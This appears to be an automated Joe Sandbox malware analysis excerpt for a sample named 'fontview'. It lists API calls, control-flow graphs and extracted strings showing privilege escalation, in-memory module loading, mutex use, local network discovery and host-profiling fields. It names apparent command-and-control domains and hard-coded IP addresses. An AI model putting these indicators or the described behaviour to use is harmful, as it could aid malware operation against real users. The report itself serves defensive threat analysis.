                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 3038321057-2896544425
                                                      • Opcode ID: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
                                                      • Instruction ID: 79d661b54e262ca987bee1b9e957b190e0284badbbec8ecc12dccea534644da2
                                                      • Opcode Fuzzy Hash: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
                                                      • Instruction Fuzzy Hash: 2301A871A00229ABEB10DFA5CC59EEFBFBCEF04744F444055E515E6190E7709A44DBA1
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 00820487
                                                      • LoadLibraryA.KERNELBASE(?), ref: 00820574
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0082072B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_3_820000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual$AllocLibraryLoadProtect
                                                      • String ID:
                                                      • API String ID: 1403325721-0
                                                      • Opcode ID: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
                                                      • Instruction ID: 81e179e7621e7a7407589590c9823b404329f22684aa4cd284f05b5857b04705
                                                      • Opcode Fuzzy Hash: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
                                                      • Instruction Fuzzy Hash: 2F022471A083119FC714CF29D590A2ABBE5FF98714F05896EE889DB352D770E880CF92

                                                      Control-flow Graph

                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 10005C19
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 10005CB7
                                                      • _sprintf.LIBCMT ref: 10005D14
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,?), ref: 10005D90
                                                      • _sprintf.LIBCMT ref: 10005DE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateMutex_sprintf$Startup
                                                      • String ID: %s%s$331.$331.$5566$5566$611.$a2b.sh3y.com$agi.vh748yy.com$api.$api.$api.5566331.com$api.5566331.com$c1werjkdi%42&!#012$c1werjkdi%42&!#456$c1werjkdi%42&!#789$com$com$live$p.61$tki.bb5483b.com$wktc$wktcp.61611.live
                                                      • API String ID: 2582006962-90602932
                                                      • Opcode ID: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
                                                      • Instruction ID: 58b0ecb6076ab785b7a927ea96f25bffcb0b9f035f233e99f1965f63245a51b2
                                                      • Opcode Fuzzy Hash: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
                                                      • Instruction Fuzzy Hash: C5D17FB440C780AEE325DF60CC81FEBB7E8EB95344F44492DF19D46182DB75A549CBA2
                                                      APIs
                                                      • ___createFile.LIBCMT ref: 1004BCF9
                                                      • ___createFile.LIBCMT ref: 1004BD3A
                                                      • GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD63
                                                      • __dosmaperr.LIBCMT ref: 1004BD6A
                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD7D
                                                      • GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDA0
                                                      • __dosmaperr.LIBCMT ref: 1004BDA9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDB2
                                                      • __set_osfhnd.LIBCMT ref: 1004BDE2
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BE4C
                                                      • __close_nolock.LIBCMT ref: 1004BE72
                                                      • __chsize_nolock.LIBCMT ref: 1004BEA2
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BEB4
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BFAC
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BFC1
                                                      • __close_nolock.LIBCMT ref: 1004C021
                                                        • Part of subcall function 100411E8: CloseHandle.KERNEL32(00000000,1000DD8F,00000000,?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041238
                                                        • Part of subcall function 100411E8: GetLastError.KERNEL32(?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041242
                                                        • Part of subcall function 100411E8: __free_osfhnd.LIBCMT ref: 1004124F
                                                        • Part of subcall function 100411E8: __dosmaperr.LIBCMT ref: 10041271
                                                        • Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F
                                                      • __lseeki64_nolock.LIBCMT ref: 1004C043
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C178
                                                      • ___createFile.LIBCMT ref: 1004C197
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C1A4
                                                      • __dosmaperr.LIBCMT ref: 1004C1AB
                                                      • __free_osfhnd.LIBCMT ref: 1004C1CB
                                                      • __invoke_watson.LIBCMT ref: 1004C1F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd
                                                      • String ID: @
                                                      • API String ID: 710831883-2766056989
                                                      • Opcode ID: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
                                                      • Instruction ID: 4bc8964a9d16cae8c67520329504f5e8b6c1dd015f7f366feaadc10eed736cac
                                                      • Opcode Fuzzy Hash: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
                                                      • Instruction Fuzzy Hash: 5A220471D00A0A9FEB55CF68CC91BAD7BA1EB04390F344279E911EB2E2C7759D40C799

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 327 1001a36c-1001a394 328 1001a396-1001a39d 327->328 329 1001a3f9 327->329 330 1001a3a1-1001a3ae call 1001a0f8 328->330 331 1001a39f 328->331 332 1001a3fb-1001a40c 329->332 330->329 335 1001a3b0-1001a3ee htons socket 330->335 331->330 336 1001a3f0-1001a3f6 WSAGetLastError 335->336 337 1001a40d-1001a42c setsockopt 335->337 336->329 338 1001a430-1001a450 inet_ntoa call 10001d63 337->338 341 1001a452-1001a46b call 100359ab 338->341 342 1001a46e-1001a477 338->342 341->342 344 1001a484-1001a4b3 call 1000191e connect 342->344 345 1001a479-1001a47f call 10001e92 342->345 350 1001a4b9-1001a4bf 344->350 351 1001a60a-1001a610 call 10001d92 344->351 345->344 353 1001a4c5-1001a4fe call 10016caa 350->353 354 1001a59f-1001a5a2 350->354 355 1001a615-1001a617 351->355 364 1001a500-1001a503 353->364 365 1001a505 353->365 356 1001a5a4-1001a5b3 inet_addr 354->356 357 1001a5b7-1001a5ba 354->357 355->332 356->357 359 1001a5bc-1001a5cb inet_addr 357->359 360 1001a5cf-1001a5d2 357->360 359->360 362 1001a5d4-1001a5df inet_addr 360->362 363 1001a5e7-1001a602 call 10001d92 360->363 367 1001a5e3 362->367 363->338 372 1001a608 363->372 366 1001a508-1001a530 inet_addr call 10016d1b 364->366 365->366 373 1001a532-1001a54b 366->373 374 1001a57a-1001a57f 366->374 367->363 372->355 373->374 375 1001a54d-1001a551 373->375 376 1001a581-1001a58a call 10033cf2 374->376 377 1001a58b-1001a59d call 10009277 * 2 374->377 379 1001a553-1001a555 375->379 380 1001a557 375->380 376->377 377->367 383 1001a559-1001a56b call 1000191e 379->383 380->383 389 1001a56d 383->389 390 1001a56f-1001a576 inet_addr 383->390 389->390 390->374
                                                      APIs
                                                      • htons.WS2_32(?), ref: 1001A3C7
                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 1001A3E0
                                                      • WSAGetLastError.WS2_32 ref: 1001A3F0
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001A426
                                                      • inet_ntoa.WS2_32(?), ref: 1001A434
                                                      • _wprintf.LIBCMT ref: 1001A466
                                                      • connect.WS2_32(?,?,00000010), ref: 1001A4AA
                                                      • inet_addr.WS2_32(114.114.114.114), ref: 1001A51E
                                                        • Part of subcall function 10016D1B: __EH_prolog.LIBCMT ref: 10016D20
                                                        • Part of subcall function 10016D1B: _sprintf.LIBCMT ref: 10016D94
                                                      • inet_addr.WS2_32 ref: 1001A570
                                                      • inet_addr.WS2_32(47.76.212.112), ref: 1001A5A9
                                                      • inet_addr.WS2_32(47.76.187.31), ref: 1001A5C1
                                                      • inet_addr.WS2_32(47.76.24.248), ref: 1001A5D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: inet_addr$ErrorH_prologLast_sprintf_wprintfconnecthtonsinet_ntoasetsockoptsocket
                                                      • String ID: 114.114.114.114$47.76.187.31$47.76.212.112$47.76.24.248$DNSLookup result (%s):$Error (%s) in line: %d in file: %s$connect ip:%s $inc\http\Socket.cpp$value.length() > 0
                                                      • API String ID: 1519317838-3972532071
                                                      • Opcode ID: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
                                                      • Instruction ID: 7b49e0120e11b4ab11456f49e9eb18eb1437e29c51d74eb201d297852d276499
                                                      • Opcode Fuzzy Hash: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
                                                      • Instruction Fuzzy Hash: A6717C70508741AFD724CF69C885A6EB7F5FF89310F508A2EF5A6C62A1D731E984CB12

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001A6DD
                                                        • Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
                                                        • Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                      • _sprintf.LIBCMT ref: 1001A741
                                                        • Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
                                                        • Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C
                                                        • Part of subcall function 100168F4: __EH_prolog.LIBCMT ref: 100168F9
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7B4
                                                      • GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7BC
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7DF
                                                      • GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7E7
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A815
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A818
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83E
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?), ref: 1001A852
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A87C
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A893
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A89A
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8AD
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8B5
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8BD
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseHandleRelease$CreateErrorH_prologLast$Open_sprintf$ComputerGuidNameSleep_fprintf_memmove
                                                      • String ID: %s%s$13a.dh7483y.com$jkdi%42&!#
                                                      • API String ID: 1969416865-4094921056
                                                      • Opcode ID: b4b3263dde0bb6df3b479309dc3643e6ae1af02ec3241fba3ce66be87d0a3e12
                                                      • Instruction ID: a8d946be910b25d93d618c846ade29e6a59fa686ccbc9f3ba0165ef815e5f331
                                                      • Opcode Fuzzy Hash: b4b3263dde0bb6df3b479309dc3643e6ae1af02ec3241fba3ce66be87d0a3e12
                                                      • Instruction Fuzzy Hash: 7D518171D04268EFEB11DBA4CC95FEE7BB8EF04340F440029F505A7192DB74AA89CBA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 439 1001c9a2-1001c9cb 440 1001c9d1-1001cab0 htons inet_addr setsockopt call 10039700 call 10002d15 call 1000191f call 10003256 call 100022f0 439->440 441 1001d12e-1001d144 439->441 452 1001d022-1001d026 440->452 453 1001cab5-1001cb02 Sleep call 10039700 call 1001e307 452->453 454 1001d02c 452->454 464 1001cb05-1001cb0a 453->464 456 1001d0fd-1001d100 454->456 458 1001d102-1001d10a closesocket 456->458 459 1001d10d-1001d129 call 10001d92 * 3 456->459 458->459 459->441 464->464 466 1001cb0c-1001cb2d sendto 464->466 466->452 468 1001cb33 466->468 470 1001ce6b-1001cea6 call 10039700 recvfrom 468->470 473 1001cb38-1001cbcd call 1000191e inet_ntoa call 10001d63 call 1001e275 call 10002e39 call 1001e275 call 10002e39 call 10034050 470->473 474 1001ceac-1001ceb7 WSAGetLastError 470->474 511 1001cc2a-1001cc76 call 10002d15 call 1000191f call 10003256 473->511 512 1001cbcf-1001cbf5 473->512 474->452 476 1001cebd-1001cee9 call 1001df0d 474->476 482 1001d011 476->482 483 1001ceef-1001cf12 call 10039ac8 476->483 485 1001d015-1001d01d call 10001d92 482->485 491 1001cf18-1001cf1b 483->491 492 1001cfff-1001d006 483->492 485->452 494 1001cf21 491->494 495 1001d0f4 491->495 496 1001d0d7-1001d0db 492->496 497 1001d00c-1001d00d 492->497 494->482 499 1001d0f8 call 10001d92 495->499 496->495 500 1001d0dd-1001d0e3 496->500 497->482 499->456 501 1001d0e5-1001d0e9 500->501 502 1001d0eb-1001d0ed 500->502 505 1001d0ef call 10006146 501->505 502->505 505->495 531 1001cc7d-1001cc81 511->531 514 1001cbfd-1001cc01 512->514 516 1001cc03-1001cc05 514->516 517 1001cc1d-1001cc1f 514->517 520 1001cc07-1001cc0d 516->520 521 1001cc19-1001cc1b 516->521 518 1001cc22-1001cc24 517->518 518->511 522 1001cf26-1001cf55 call 1000191e 518->522 520->517 524 1001cc0f-1001cc17 520->524 521->518 529 1001d031-1001d035 522->529 530 1001cf5b 522->530 524->514 524->521 532 1001d037-1001d03d 529->532 533 1001d04e-1001d06a call 10001d92 * 2 529->533 534 1001cf5c-1001cf78 call 10001d92 * 2 530->534 535 1001cc83-1001cc85 531->535 536 1001cc9d-1001cc9f 531->536 538 1001d045-1001d047 532->538 539 1001d03f-1001d043 532->539 533->499 534->485 542 1001cc87-1001cc8d 535->542 543 1001cc99-1001cc9b 535->543 537 1001cca2-1001cca4 536->537 544 1001cca6 537->544 545 1001ccaa-1001cd13 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 537->545 546 1001d049 call 10006146 538->546 539->546 542->536 549 1001cc8f-1001cc97 542->549 543->537 544->545 567 1001cd19-1001cd27 545->567 568 1001cf7d-1001cf8b 545->568 546->533 549->531 549->543 569 1001cd2e-1001cd32 567->569 570 1001cf92-1001cf96 568->570 573 1001cd34-1001cd36 569->573 574 1001cd4e-1001cd50 569->574 571 1001cfb2-1001cfb4 570->571 572 1001cf98-1001cf9a 570->572 579 1001cfb7-1001cffa call 1000191e call 10001d92 * 3 571->579 575 1001cf9c-1001cfa2 572->575 576 1001cfae-1001cfb0 572->576 577 1001cd38-1001cd3e 573->577 578 1001cd4a-1001cd4c 573->578 580 1001cd53-1001cd55 574->580 575->571 581 1001cfa4-1001cfac 575->581 576->579 577->574 582 1001cd40-1001cd48 577->582 578->580 579->534 584 1001cd57-1001cd6e 580->584 585 1001cda8-1001cdcd call 10002d15 580->585 581->570 581->576 582->569 582->578 588 1001cd75-1001cd79 584->588 593 1001cdd9-1001cdf1 call 10001d92 585->593 594 1001cdcf-1001cdd4 call 10001e92 585->594 591 1001cd95-1001cd97 588->591 592 1001cd7b-1001cd7d 588->592 598 1001cd9a-1001cd9c 591->598 596 1001cd91-1001cd93 592->596 597 1001cd7f-1001cd85 592->597 606 1001d0b1-1001d0d2 call 10001d92 * 3 593->606 607 1001cdf7-1001ce1b call 1000c213 call 10010dd2 593->607 594->593 596->598 597->591 602 1001cd87-1001cd8f 597->602 598->585 603 1001cd9e-1001cda2 598->603 602->588 602->596 603->568 603->585 606->533 619 1001ce21-1001ce66 call 10001d92 * 6 607->619 620 1001d06f-1001d08e call 10001e92 607->620 619->470 627 1001d090-1001d09d 620->627 628 1001d09f-1001d0aa 620->628 630 1001d0ac call 10006376 627->630 628->630 630->606
                                                      APIs
                                                      • htons.WS2_32(00005CE3), ref: 1001C9DE
                                                      • inet_addr.WS2_32(255.255.255.255), ref: 1001C9EE
                                                      • setsockopt.WS2_32 ref: 1001CA0D
                                                        • Part of subcall function 100022F0: gethostname.WS2_32(?,00000100), ref: 1000230B
                                                      • Sleep.KERNELBASE(0000000A), ref: 1001CAB7
                                                      • sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001CB24
                                                      • recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001CE9D
                                                      • WSAGetLastError.WS2_32(?,?,00000000,?,?,?,?,?,bck,00000000,?), ref: 1001CEAC
                                                      • _memcmp.LIBCMT ref: 1001CF08
                                                      • closesocket.WS2_32(?), ref: 1001D104
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastSleep_memcmpclosesocketgethostnamehtonsinet_addrrecvfromsendtosetsockopt
                                                      • String ID: 127.0.0.1$255.255.255.255$[%d]Find szIPAddr:%s.Host:%s is not same.$bck$bck_w$bckhst$recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d$serch recvfrom :%s.
                                                      • API String ID: 2742795110-796237128
                                                      • Opcode ID: 825255176a69660cc3590cc8406f4287b336bf92dea0443eec03fd7548000463
                                                      • Instruction ID: 71a6e8450f25750b8eb19ae326af7dcd83f814d640ad7f3094fd8df69461fb78
                                                      • Opcode Fuzzy Hash: 825255176a69660cc3590cc8406f4287b336bf92dea0443eec03fd7548000463
                                                      • Instruction Fuzzy Hash: 5D12A335108385AEE331DB20C891FEBB7E9EF95344F50491EE5CA86092DB71E989CB53

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 639 10011c4e-10011cc3 call 1004eb10 call 100021eb 644 10011ce1-10011d74 call 100022f0 call 10015fd9 call 1001bc82 call 10002d5e call 10001d92 call 10002eeb call 10008f12 call 10008fc0 639->644 645 10011cc5-10011cdc call 100022c4 * 2 639->645 665 10011d76-10011d7a 644->665 666 10011d7c-10011d83 644->666 645->644 665->665 665->666 667 10011d85-10011d89 666->667 667->667 668 10011d8b-10011db6 call 10009053 667->668 671 10011db8-10011dbc 668->671 672 10011dbe-10011dc5 668->672 671->671 671->672 673 10011dc7-10011dcb 672->673 673->673 674 10011dcd-10011def call 10009053 673->674 677 10011df1-10011df5 674->677 678 10011df7-10011dfe 674->678 677->677 677->678 679 10011e00-10011e04 678->679 679->679 680 10011e06-10011e22 call 10009053 679->680 683 10011e24 680->683 684 10011e26-10011e2b 680->684 683->684 685 10011e33-10011e3a 684->685 686 10011e2d-10011e31 684->686 687 10011e3c-10011e40 685->687 686->685 686->686 687->687 688 10011e42-10011e5e call 10009053 687->688 691 10011e60 688->691 692 10011e62-10011e67 688->692 691->692 693 10011e69-10011e6d 692->693 694 10011e6f-10011e76 692->694 693->693 693->694 695 10011e78-10011e7c 694->695 695->695 696 10011e7e-10011e95 call 10009053 695->696 699 10011e97-10011e9b 696->699 699->699 700 10011e9d-10011eb5 call 10009f0d 699->700 703 10011eb7-10011ebb 700->703 703->703 704 10011ebd-10011ec4 703->704 705 10011ec6-10011eca 704->705 705->705 706 10011ecc-10011ee3 call 10009053 705->706 709 10011ee5-10011ee9 706->709 709->709 710 10011eeb-10011f5d call 10009f0d call 10001d63 * 2 709->710 717 10011f63 710->717 718 10012138-10012231 call 10009005 call 10008ee2 call 10009f88 call 10008ebb call 10001d63 call 10033984 call 10032fe8 call 10033984 call 10032fe8 call 10001d92 * 2 call 10008f9c call 10001d92 * 3 710->718 719 10011f66-10011f86 717->719 721 10011f88 719->721 722 10011f8a-10011f8f 719->722 721->722 724 10011f91-10011f95 722->724 725 10011f97-10011f99 722->725 724->724 724->725 728 10011f9e-10011fa2 725->728 728->728 730 10011fa4-10011fbf call 10009053 728->730 736 10011fc1-10011fc5 730->736 736->736 738 10011fc7-10011fe3 call 10009f0d 736->738 744 10011fe5-10011fe9 738->744 744->744 745 10011feb-10012007 call 10009f0d 744->745 752 10012009-1001200d 745->752 752->752 754 1001200f-10012038 call 10009f0d 752->754 760 1001203a 754->760 761 1001203c-10012041 754->761 760->761 763 10012043-10012047 761->763 764 10012049-1001204b 761->764 763->763 763->764 766 10012050-10012054 764->766 766->766 768 10012056-10012071 call 10009053 766->768 774 10012073-10012077 768->774 774->774 775 10012079-10012095 call 10009f0d 774->775 782 10012097-1001209b 775->782 782->782 783 1001209d-100120c9 call 1000a371 782->783 786 100120cb 783->786 787 100120cd-100120d2 783->787 786->787 788 100120d4-100120d8 787->788 789 100120da-100120dc 787->789 788->788 788->789 790 100120e1-100120e5 789->790 790->790 791 100120e7-10012130 call 10009053 call 100090a4 790->791 791->719 796 10012136 791->796 796->718
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10011C53
                                                        • Part of subcall function 100021EB: GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
                                                      • _free.LIBCMT ref: 100121B7
                                                      • _free.LIBCMT ref: 100121CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AdaptersH_prologInfo
                                                      • String ID: 1.0.0.64$c_post_id$client_id$d_plat$err_cdn$err_code$err_info$host$is_down$is_exe$list$mac$plug_id$sys_res$uuid$version
                                                      • API String ID: 2722462171-1692044417
